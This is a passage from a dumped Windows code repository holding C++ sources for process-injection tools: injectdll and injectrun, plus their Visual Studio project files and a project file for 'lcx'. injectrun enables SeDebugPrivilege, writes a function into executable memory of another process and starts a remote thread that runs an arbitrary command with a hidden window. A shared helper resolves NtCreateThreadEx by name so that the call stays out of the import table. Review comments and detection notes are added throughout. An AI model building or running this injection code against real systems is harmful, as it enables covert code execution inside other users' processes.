    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES tp = { 0 };
    if (!OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
        return FALSE;
    tp.PrivilegeCount = 1;
    if (!LookupPrivilegeValue(NULL, pstrPrivilege, &tp.Privileges[0].Luid))
    {
        CloseHandle(hToken);
        return FALSE;
    }
    if (bEnable)
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    else
        tp.Privileges[0].Attributes = 0;
    if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
    {
        CloseHandle(hToken);
        return FALSE;
    }
    // The call above can succeed without granting the privilege (the token
    // does not hold it); that case is only visible through GetLastError().
    if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
    {
        CloseHandle(hToken);
        return FALSE;
    }
    CloseHandle(hToken);
    return TRUE;
}

// Entry point. Returns 0 after printing usage, otherwise 1 whether or not the
// injection worked. The result of enabling SeDebugPrivilege is ignored.
int main(int argc, char* argv[])
{
    if (argc !=3 && argc != 4)
    {
        printf("Usage:\n\tinjectdll.exe pid dllpath [func]");
        return 0;
    }

    EnableProcessPrivilege(GetCurrentProcess(), SE_DEBUG_NAME, TRUE);
    if (argc == 3)
        InjectDLL(argv[1], argv[2], NULL);
    if (argc == 4)
        InjectDLL(argv[1], argv[2], argv[3]);

    return 1;
}
-------------------------------------------------------------------------------- /injectdll/injectdll.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {852EFC89-5C41-4851-B69E-0ACE53DEA651} 23 | Win32Proj 24 | injectdll 25 | 8.1 26 | 27 | 28 | 29 | Application 30 | true 31 | v140 32 | Unicode 33 | 34 | 35 | Application 36 | false 37 | v140 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v140 45 | Unicode 46 | 47 | 48 | Application 49 | false 50 | v140 51 | true 52 | MultiByte 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level3 102 | Disabled 103 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | 105 | 106 | Console 107 | true 108 | 109 | 110 | 111 | 112 | Level3 113 | 114 | 115 | MaxSpeed 116 | true 117 | true 118 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | 120 | 121 | Console 122 | true 123 | true 124 | true 125 | 126 | 127 | 128 | 129 | Level3 130 | 131 | 132 | MaxSpeed 133 | true 134 | true 135 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 136 | 137 | 138 | Console 139 | true 140 | true 141 | true 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | -------------------------------------------------------------------------------- /injectdll/injectdll.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | 
cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | 26 | 27 | Header Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /injectdll/injectlib.cpp: --------------------------------------------------------------------------------
#include "injectlib.h"


// Starts a thread in another process, picking the API from the Windows
// version that GetVersionEx reports. The parameters mirror CreateRemoteThread.
//
//   reported major 3..5      -> kernel32!CreateRemoteThread
//   reported 6.0 / 6.1       -> ntdll!NtCreateThreadEx
//   anything else            -> kernel32!CreateRemoteThread
//
// Returns the new thread handle, or NULL when the version query, a module
// load, a symbol lookup or the thread creation fails. In the NtCreateThreadEx
// branch the NTSTATUS is translated and stored with SetLastError().
//
// In the NtCreateThreadEx branch lpThreadAttributes, dwStackSize and
// dwCreationFlags are ignored.
//
// For detection: the native call is resolved by name at run time, so it does
// not appear in the import table. Monitoring that relies on thread-creation
// events (for example Sysmon Event ID 8) is presumably unaffected by which of
// the two APIs is used - verify in your own telemetry.
HANDLE _CreateRemoteThread(HANDLE hProcess,
    LPSECURITY_ATTRIBUTES lpThreadAttributes,
    DWORD dwStackSize,
    LPTHREAD_START_ROUTINE lpStartAddress,
    LPVOID lpParameter,
    DWORD dwCreationFlags,
    LPDWORD lpThreadId)
{
    NTSTATUS Status;
    HANDLE hThread;
    NTCREATETHREADEXBUFFER ntBuffer;
    DWORD dw0, dw1, MyOSMajorVersion, MyOSMinorVersion;
    OSVERSIONINFO osvi;
    BOOL MyOSWinNT, MyOSWinNT3_2003, MyOSWinVista_7, MyOSWinVista_8;
    HMODULE hKernel32, hNTDLL;
    CREATEREMOTETHREAD MyCreateRemoteThread;
    GETTHREADID MyGetThreadId;
    RTLNTSTATUSTODOSERROR MyRtlNtStatusToDosError;
    NTCREATETHREADEX MyNtCreateThreadEx;

    // Get Windows version
    // NOTE(review): GetVersionEx is deprecated and, for a process without a
    // compatibility manifest, reports at most 6.2 on Windows 8.1 and later.
    osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);

    if (!GetVersionEx(&osvi))
        return NULL;

    // Save version data in local variables
    MyOSMajorVersion = osvi.dwMajorVersion;
    MyOSMinorVersion = osvi.dwMinorVersion;
    MyOSWinNT = osvi.dwPlatformId == VER_PLATFORM_WIN32_NT;
    MyOSWinNT3_2003 = (MyOSWinNT && MyOSMajorVersion >= 3 && MyOSMajorVersion <= 5) ? TRUE : FALSE; // Win NT 3.1 to 2003
    MyOSWinVista_7 = (MyOSWinNT && MyOSMajorVersion == 6 && MyOSMinorVersion <= 1) ? TRUE : FALSE; // Win Vista to 7
    MyOSWinVista_8 = (MyOSWinNT && MyOSMajorVersion == 6 && MyOSMinorVersion >= 2) ? TRUE : FALSE; // 8 to ? (computed but never read)

    /***** Win NT *****/
    // The function pointers are only assigned inside this block. On a non-NT
    // platform id the final `else` below would call through an uninitialised
    // pointer.
    if (MyOSWinNT)
    {
        // Neither module handle is released with FreeLibrary.
        if (!(hKernel32 = LoadLibrary("Kernel32.dll")))
            return NULL;
        if (!(hNTDLL = LoadLibrary("NTDLL.DLL")))
            return NULL;

        // Win NT all versions
        if (!(MyCreateRemoteThread = (CREATEREMOTETHREAD)GetProcAddress(hKernel32, "CreateRemoteThread")))
            return NULL;
        if (!(MyRtlNtStatusToDosError = (RTLNTSTATUSTODOSERROR)GetProcAddress(hNTDLL, "RtlNtStatusToDosError")))
            return NULL;

        // Win 2003 or later
        if ((MyOSMajorVersion == 5 && MyOSMinorVersion >= 2) || MyOSMajorVersion == 6)
        {
            if (!(MyGetThreadId = (GETTHREADID)GetProcAddress(hKernel32, "GetThreadId")))
                return NULL;
        }

        // Win Vista or later
        if (MyOSMajorVersion >= 6)
        {
            if (!(MyNtCreateThreadEx = (NTCREATETHREADEX)GetProcAddress(hNTDLL, "NtCreateThreadEx")))
                return NULL;
        }
    }//WinNT

    // Win NT 3.1 to 2003
    if (MyOSWinNT3_2003)
    {
        return MyCreateRemoteThread(hProcess,
            lpThreadAttributes,
            dwStackSize,
            lpStartAddress,
            lpParameter,
            dwCreationFlags,
            lpThreadId);
    }
    // Win Vista and Win 7 (reported 6.0 / 6.1)
    else if (MyOSWinVista_7)
    {
        // Setup and initialize the buffer
        // NOTE(review): ntBuffer is filled in but never passed on - the last
        // argument of the call below is NULL - so these assignments have no
        // visible effect.
        memset(&ntBuffer, 0, sizeof(NTCREATETHREADEXBUFFER));
        dw0 = 0;
        dw1 = 0;
        ntBuffer.Size = sizeof(NTCREATETHREADEXBUFFER);
        ntBuffer.Unknown1 = 0x10003;
        ntBuffer.Unknown2 = 0x8;
        ntBuffer.Unknown3 = &dw1;
        ntBuffer.Unknown4 = 0;
        ntBuffer.Unknown5 = 0x10004;
        ntBuffer.Unknown6 = 4;
        ntBuffer.Unknown7 = &dw0;
        ntBuffer.Unknown8 = 0;
        // 0x1FFFFF is the requested access mask for the new thread handle;
        // presumably the numeric value of THREAD_ALL_ACCESS - TODO confirm.
        Status = MyNtCreateThreadEx(&hThread, 0x1FFFFF, NULL, hProcess, lpStartAddress, lpParameter, FALSE, NULL, NULL, NULL, NULL);
        if (!NT_SUCCESS(Status))
        {
            SetLastError(MyRtlNtStatusToDosError(Status));
            return NULL;
        }
        if (lpThreadId)
            *lpThreadId = MyGetThreadId(hThread);
        return hThread;
    }
    // Win8 to win10~?
    else
    {
        return MyCreateRemoteThread(hProcess,
            lpThreadAttributes,
            dwStackSize,
            lpStartAddress,
            lpParameter,
            dwCreationFlags,
            lpThreadId);
    }
}
-------------------------------------------------------------------------------- /injectdll/injectlib.h: -------------------------------------------------------------------------------- 1 | #ifndef __INJECTLIB_H__ 2 | #define __INJECTLIB_H__ 3 | 4 | #include 5 | #include 6 | 7 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) 8 | 9 | typedef struct _UNICODE_STRING { 10 | USHORT Length; 11 | USHORT MaximumLength; 12 | PWSTR Buffer; 13 | } UNICODE_STRING, *PUNICODE_STRING; 14 | 15 | typedef struct _OBJECT_ATTRIBUTES { 16 | ULONG Length; 17 | HANDLE RootDirectory; 18 | PUNICODE_STRING ObjectName; 19 | ULONG Attributes; 20 | PSECURITY_DESCRIPTOR SecurityDescriptor; 21 | PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService; 22 | } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 23 | 24 | // Buffer argument passed to NtCreateThreadEx function 25 | typedef struct _NTCREATETHREADEXBUFFER 26 | { 27 | ULONG Size; 28 | ULONG Unknown1; 29 | ULONG Unknown2; 30 | PULONG Unknown3; 31 | ULONG Unknown4; 32 | ULONG Unknown5; 33 | ULONG Unknown6; 34 | PULONG Unknown7; 35 | ULONG Unknown8; 36 | } NTCREATETHREADEXBUFFER; 37 | 38 | // System functions loaded dynamically 39 | typedef DWORD (WINAPI *GETTHREADID)(HANDLE); 40 | typedef HANDLE (WINAPI *CREATEREMOTETHREAD)(HANDLE, LPSECURITY_ATTRIBUTES, DWORD, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD); 41 | typedef NTSTATUS (NTAPI *NTCREATETHREADEX)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, LPTHREAD_START_ROUTINE, LPVOID, ULONG, ULONG, ULONG, ULONG, LPVOID); 42 | typedef ULONG (NTAPI *RTLNTSTATUSTODOSERROR)(NTSTATUS); 43 | 44 | HANDLE _CreateRemoteThread(HANDLE hProcess, 45 | LPSECURITY_ATTRIBUTES lpThreadAttributes, 46 | DWORD dwStackSize, 47 | LPTHREAD_START_ROUTINE lpStartAddress, 48 | LPVOID lpParameter, 49 | 
DWORD dwCreationFlags, 50 | LPDWORD lpThreadId); 51 | 52 | 53 | #endif // __INJECTLIB_H__ 54 | -------------------------------------------------------------------------------- /injectrun/injectlib.cpp: --------------------------------------------------------------------------------
#include "injectlib.h"


// Copy of the helper that also appears under /injectdll/ on this page.
// Starts a thread in another process, picking the API from the Windows
// version that GetVersionEx reports. The parameters mirror CreateRemoteThread.
//
//   reported major 3..5      -> kernel32!CreateRemoteThread
//   reported 6.0 / 6.1       -> ntdll!NtCreateThreadEx
//   anything else            -> kernel32!CreateRemoteThread
//
// Returns the new thread handle, or NULL when the version query, a module
// load, a symbol lookup or the thread creation fails. In the NtCreateThreadEx
// branch the NTSTATUS is translated and stored with SetLastError(), and
// lpThreadAttributes, dwStackSize and dwCreationFlags are ignored.
//
// For detection: the native call is resolved by name at run time, so it does
// not appear in the import table. Monitoring that relies on thread-creation
// events (for example Sysmon Event ID 8) is presumably unaffected by which of
// the two APIs is used - verify in your own telemetry.
HANDLE _CreateRemoteThread(HANDLE hProcess,
    LPSECURITY_ATTRIBUTES lpThreadAttributes,
    DWORD dwStackSize,
    LPTHREAD_START_ROUTINE lpStartAddress,
    LPVOID lpParameter,
    DWORD dwCreationFlags,
    LPDWORD lpThreadId)
{
    NTSTATUS Status;
    HANDLE hThread;
    NTCREATETHREADEXBUFFER ntBuffer;
    DWORD dw0, dw1, MyOSMajorVersion, MyOSMinorVersion;
    OSVERSIONINFO osvi;
    BOOL MyOSWinNT, MyOSWinNT3_2003, MyOSWinVista_7, MyOSWinVista_8;
    HMODULE hKernel32, hNTDLL;
    CREATEREMOTETHREAD MyCreateRemoteThread;
    GETTHREADID MyGetThreadId;
    RTLNTSTATUSTODOSERROR MyRtlNtStatusToDosError;
    NTCREATETHREADEX MyNtCreateThreadEx;

    // Get Windows version
    // NOTE(review): GetVersionEx is deprecated and, for a process without a
    // compatibility manifest, reports at most 6.2 on Windows 8.1 and later.
    osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);

    if (!GetVersionEx(&osvi))
        return NULL;

    // Save version data in local variables
    MyOSMajorVersion = osvi.dwMajorVersion;
    MyOSMinorVersion = osvi.dwMinorVersion;
    MyOSWinNT = osvi.dwPlatformId == VER_PLATFORM_WIN32_NT;
    MyOSWinNT3_2003 = (MyOSWinNT && MyOSMajorVersion >= 3 && MyOSMajorVersion <= 5) ? TRUE : FALSE; // Win NT 3.1 to 2003
    MyOSWinVista_7 = (MyOSWinNT && MyOSMajorVersion == 6 && MyOSMinorVersion <= 1) ? TRUE : FALSE; // Win Vista to 7
    MyOSWinVista_8 = (MyOSWinNT && MyOSMajorVersion == 6 && MyOSMinorVersion >= 2) ? TRUE : FALSE; // 8 to ? (computed but never read)

    /***** Win NT *****/
    // The function pointers are only assigned inside this block. On a non-NT
    // platform id the final `else` below would call through an uninitialised
    // pointer.
    if (MyOSWinNT)
    {
        // Neither module handle is released with FreeLibrary.
        if (!(hKernel32 = LoadLibrary("Kernel32.dll")))
            return NULL;
        if (!(hNTDLL = LoadLibrary("NTDLL.DLL")))
            return NULL;

        // Win NT all versions
        if (!(MyCreateRemoteThread = (CREATEREMOTETHREAD)GetProcAddress(hKernel32, "CreateRemoteThread")))
            return NULL;
        if (!(MyRtlNtStatusToDosError = (RTLNTSTATUSTODOSERROR)GetProcAddress(hNTDLL, "RtlNtStatusToDosError")))
            return NULL;

        // Win 2003 or later
        if ((MyOSMajorVersion == 5 && MyOSMinorVersion >= 2) || MyOSMajorVersion == 6)
        {
            if (!(MyGetThreadId = (GETTHREADID)GetProcAddress(hKernel32, "GetThreadId")))
                return NULL;
        }

        // Win Vista or later
        if (MyOSMajorVersion >= 6)
        {
            if (!(MyNtCreateThreadEx = (NTCREATETHREADEX)GetProcAddress(hNTDLL, "NtCreateThreadEx")))
                return NULL;
        }
    }//WinNT

    // Win NT 3.1 to 2003
    if (MyOSWinNT3_2003)
    {
        return MyCreateRemoteThread(hProcess,
            lpThreadAttributes,
            dwStackSize,
            lpStartAddress,
            lpParameter,
            dwCreationFlags,
            lpThreadId);
    }
    // Win Vista and Win 7 (reported 6.0 / 6.1)
    else if (MyOSWinVista_7)
    {
        // Setup and initialize the buffer
        // NOTE(review): ntBuffer is filled in but never passed on - the last
        // argument of the call below is NULL - so these assignments have no
        // visible effect.
        memset(&ntBuffer, 0, sizeof(NTCREATETHREADEXBUFFER));
        dw0 = 0;
        dw1 = 0;
        ntBuffer.Size = sizeof(NTCREATETHREADEXBUFFER);
        ntBuffer.Unknown1 = 0x10003;
        ntBuffer.Unknown2 = 0x8;
        ntBuffer.Unknown3 = &dw1;
        ntBuffer.Unknown4 = 0;
        ntBuffer.Unknown5 = 0x10004;
        ntBuffer.Unknown6 = 4;
        ntBuffer.Unknown7 = &dw0;
        ntBuffer.Unknown8 = 0;
        // 0x1FFFFF is the requested access mask for the new thread handle;
        // presumably the numeric value of THREAD_ALL_ACCESS - TODO confirm.
        Status = MyNtCreateThreadEx(&hThread, 0x1FFFFF, NULL, hProcess, lpStartAddress, lpParameter, FALSE, NULL, NULL, NULL, NULL);
        if (!NT_SUCCESS(Status))
        {
            SetLastError(MyRtlNtStatusToDosError(Status));
            return NULL;
        }
        if (lpThreadId)
            *lpThreadId = MyGetThreadId(hThread);
        return hThread;
    }
    // Win8 to win10~?
    else
    {
        return MyCreateRemoteThread(hProcess,
            lpThreadAttributes,
            dwStackSize,
            lpStartAddress,
            lpParameter,
            dwCreationFlags,
            lpThreadId);
    }
}
-------------------------------------------------------------------------------- /injectrun/injectlib.h: -------------------------------------------------------------------------------- 1 | #ifndef __INJECTLIB_H__ 2 | #define __INJECTLIB_H__ 3 | 4 | #include 5 | #include 6 | 7 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) 8 | 9 | typedef struct _UNICODE_STRING { 10 | USHORT Length; 11 | USHORT MaximumLength; 12 | PWSTR Buffer; 13 | } UNICODE_STRING, *PUNICODE_STRING; 14 | 15 | typedef struct _OBJECT_ATTRIBUTES { 16 | ULONG Length; 17 | HANDLE RootDirectory; 18 | PUNICODE_STRING ObjectName; 19 | ULONG Attributes; 20 | PSECURITY_DESCRIPTOR SecurityDescriptor; 21 | PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService; 22 | } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 23 | 24 | // Buffer argument passed to NtCreateThreadEx function 25 | typedef struct _NTCREATETHREADEXBUFFER 26 | { 27 | ULONG Size; 28 | ULONG Unknown1; 29 | ULONG Unknown2; 30 | PULONG Unknown3; 31 | ULONG Unknown4; 32 | ULONG Unknown5; 33 | ULONG Unknown6; 34 | PULONG Unknown7; 35 | ULONG Unknown8; 36 | } NTCREATETHREADEXBUFFER; 37 | 38 | // System functions loaded dynamically 39 | typedef DWORD (WINAPI *GETTHREADID)(HANDLE); 40 | typedef HANDLE (WINAPI *CREATEREMOTETHREAD)(HANDLE, LPSECURITY_ATTRIBUTES, DWORD, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD); 41 | typedef NTSTATUS (NTAPI *NTCREATETHREADEX)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, LPTHREAD_START_ROUTINE, LPVOID, ULONG, ULONG, ULONG, ULONG, LPVOID); 42 | typedef ULONG (NTAPI *RTLNTSTATUSTODOSERROR)(NTSTATUS); 43 | 44 | HANDLE _CreateRemoteThread(HANDLE hProcess, 45 | LPSECURITY_ATTRIBUTES lpThreadAttributes, 46 | DWORD dwStackSize, 47 | LPTHREAD_START_ROUTINE lpStartAddress, 48 | LPVOID lpParameter, 49 | 
DWORD dwCreationFlags, 50 | LPDWORD lpThreadId); 51 | 52 | 53 | #endif // __INJECTLIB_H__ 54 |
--------------------------------------------------------------------------------
/injectrun/injectrun.cpp:
--------------------------------------------------------------------------------
// NOTE(review): the four system header names below were lost when this page
// was extracted; they are left as found.
#include
#include
#include
#include
#include "injectlib.h"

// Defender summary of this file: it enables SeDebugPrivilege, opens a target
// process with PROCESS_ALL_ACCESS, allocates PAGE_EXECUTE_READWRITE memory in
// it, copies a function and a parameter block across and starts a remote
// thread on the copy. Each step is observable: the process-handle request
// (for example Sysmon event ID 10, ProcessAccess), the remote thread (Sysmon
// event ID 8) and the hidden child process the target then spawns.

typedef BOOL(WINAPI *typeCreateProcessA)(LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, LPSTARTUPINFOA, LPPROCESS_INFORMATION);
typedef DWORD(WINAPI *typeGetLastError)(VOID);

// Parameter block that InjectRun fills in locally and copies into the target
// process; MyFunc receives a pointer to that copy.
struct FuncInfo
{
    // Function addresses resolved in the injecting process by InjectRun.
    typeCreateProcessA CreateProcessA;
    typeGetLastError GetLastError;
    // Command line handed to CreateProcessA by MyFunc.
    char cmdline[1024];

    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
};

// Allocate `size` bytes of PAGE_EXECUTE_READWRITE memory in `process` and
// copy `size` bytes from the local buffer `address` into it.
// Returns the remote address, or NULL when the allocation or the write fails.
// NOTE(review): when WriteProcessMemory fails the remote allocation is not
// released.
void* AllocMemory(HANDLE process, void* address, int size)
{
    void* addr = VirtualAllocEx(process, 0, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (addr == NULL)
        return NULL;
    if (!WriteProcessMemory(process, addr, address, size, 0))
        return NULL;
    return addr;
}

// Thread routine whose machine code InjectRun copies into the target.
// It reaches the Win32 API only through the pointers stored in `info`.
// Starts info->cmdline with a hidden window (SW_HIDE, CREATE_NO_WINDOW).
// Returns 1 on success, otherwise the value of GetLastError().
// NOTE(review): the handles returned in info->pi are never closed.
DWORD WINAPI MyFunc(FuncInfo* info)
{
    DWORD dwRet = 0;

    info->si.cb = sizeof(info->si);
    info->si.dwFlags = STARTF_USESHOWWINDOW;
    info->si.wShowWindow = SW_HIDE;

    if (info->CreateProcessA(NULL, info->cmdline, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &info->si, &info->pi))
        return 1;
    else
        dwRet = info->GetLastError();

    return dwRet;
}

// Marker function: InjectRun subtracts the address of MyFunc from the address
// of EndFunc to get the number of bytes to copy (presumably relying on the
// compiler placing the two functions back to back, in this order).
int WINAPI EndFunc()
{
    return 0;
}

// Copy MyFunc and a filled-in FuncInfo into the process whose id is given as
// the decimal string `pid`, then start a remote thread that runs `cmdline`.
// Prints the outcome; nothing is returned to the caller.
void InjectRun(const char* pid, const char* cmdline)
{
    // NOTE(review): `res` is assigned below but never read or returned.
    bool res = false;
    FuncInfo info = { 0 };
    // NOTE(review): unbounded copy into a 1024-byte field; a longer command
    // line overflows the local FuncInfo on the stack.
    strcpy(info.cmdline, cmdline);

    HMODULE kernel = GetModuleHandleA("kernel32.dll");
    info.CreateProcessA = (typeCreateProcessA)GetProcAddress(kernel, "CreateProcessA");
    info.GetLastError = (typeGetLastError)GetProcAddress(kernel, "GetLastError");

    // NOTE(review): the process handle is never closed, and the results of
    // the two AllocMemory calls below are used without a NULL check.
    HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, atoi(pid));
    if (process)
    {
        void* ptr_func = AllocMemory(process, &MyFunc, int(EndFunc) - int(MyFunc));
        void* ptr_info = AllocMemory(process, &info, sizeof(info));
        HANDLE thread = _CreateRemoteThread(process, 0, 0, (LPTHREAD_START_ROUTINE)ptr_func, ptr_info, 0, 0);
        if (thread == 0)
            printf("CreateRemoteThread failed (err = %d)\n", GetLastError());
        else
        {
            CloseHandle(thread);
            printf("injected in process[%s]\n", pid);
            res = true;
        }
    }
    else
        printf("OpenProcess failed, err = %d", GetLastError());
}

// Enable (bEnable != 0) or disable the privilege named `pstrPrivilege` in the
// token of `hProcess`.
// Returns TRUE only when the privilege was actually adjusted; FALSE when the
// token cannot be opened, the name cannot be looked up, the adjustment fails,
// or the token does not hold the privilege.
BOOL EnableProcessPrivilege(HANDLE hProcess, PCHAR pstrPrivilege, BOOL bEnable)
{
    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES tp = { 0 };
    if (!OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
        return FALSE;
    tp.PrivilegeCount = 1;
    if (!LookupPrivilegeValue(NULL, pstrPrivilege, &tp.Privileges[0].Luid))
    {
        CloseHandle(hToken);
        return FALSE;
    }
    if (bEnable)
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    else
        tp.Privileges[0].Attributes = 0;
    if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
    {
        CloseHandle(hToken);
        return FALSE;
    }
    // The call above can report success without assigning the privilege;
    // that case is only visible through the last-error value.
    if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
    {
        CloseHandle(hToken);
        return FALSE;
    }
    CloseHandle(hToken);
    return TRUE;
}

// Entry point: expects exactly two arguments, a process id and a command line.
// NOTE(review): the usage text names injectdll.exe although this is the
// injectrun project, the result of EnableProcessPrivilege is ignored, and the
// exit codes are inverted with respect to convention (0 for the usage error,
// 1 after the injection attempt).
int main(int argc, char* argv[])
{
    if (argc !=3)
    {
        printf("Usage:\n\tinjectdll.exe pid cmdline");
        return 0;
    }

    // SE_DEBUG_NAME is SeDebugPrivilege.
    EnableProcessPrivilege(GetCurrentProcess(), SE_DEBUG_NAME, TRUE);
    InjectRun(argv[1], argv[2]);

    return 1;
}
--------------------------------------------------------------------------------
/injectrun/injectrun.vcxproj:
--------------------------------------------------------------------------------
1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {4E98049A-D21B-477E-A801-EE13B47EFCA6} 23 | Win32Proj 24 | injectrun 25 | 8.1 26 | 27 | 28 | 29 | Application 30 | true 31 | v140 32 | Unicode 33 | 34 | 35 | Application 36 | false 37 | v140 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v140 45 | Unicode 46 | 47 | 48 | Application 49 | false 50 | v140 51 | true 52 | MultiByte 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level3 102 | Disabled 103 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | 105 | 106 | Console 107 | true 108 | 109 | 110 | 111 | 112 | Level3 113 | 114 | 115 | MaxSpeed 116 | true 117 | true 118 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | 120 | 121 | Console 122 | true 123 | true 124 | true 125 | 126 | 127 | 128 | 129 | Level3 130 | 131 | 132 | MaxSpeed 133 | true 134 | true 135 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 136 | 137 | 138 | Console 139 | true 140 | true 141 | true 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | -------------------------------------------------------------------------------- /injectrun/injectrun.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 
20 | 21 | 22 | Source Files 23 | 24 | 25 | 26 | 27 | Header Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /lcx/lcx.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {A7D0DCBC-741A-4A51-B9B4-574D9CA45F64} 23 | Win32Proj 24 | lcx 25 | 8.1 26 | 27 | 28 | 29 | Application 30 | true 31 | v140 32 | Unicode 33 | 34 | 35 | Application 36 | false 37 | v140 38 | true 39 | Unicode 40 | 41 | 42 | Application 43 | true 44 | v140 45 | Unicode 46 | 47 | 48 | Application 49 | false 50 | v140 51 | true 52 | Unicode 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level3 102 | Disabled 103 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | 105 | 106 | Console 107 | true 108 | 109 | 110 | 111 | 112 | Level3 113 | 114 | 115 | MaxSpeed 116 | true 117 | true 118 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | 120 | 121 | Console 122 | true 123 | true 124 | true 125 | 126 | 127 | 128 | 129 | Level3 130 | 131 | 132 | MaxSpeed 133 | true 134 | true 135 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 136 | 137 | 138 | Console 139 | true 140 | true 141 | true 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | -------------------------------------------------------------------------------- /lcx/lcx.vcxproj.filters: 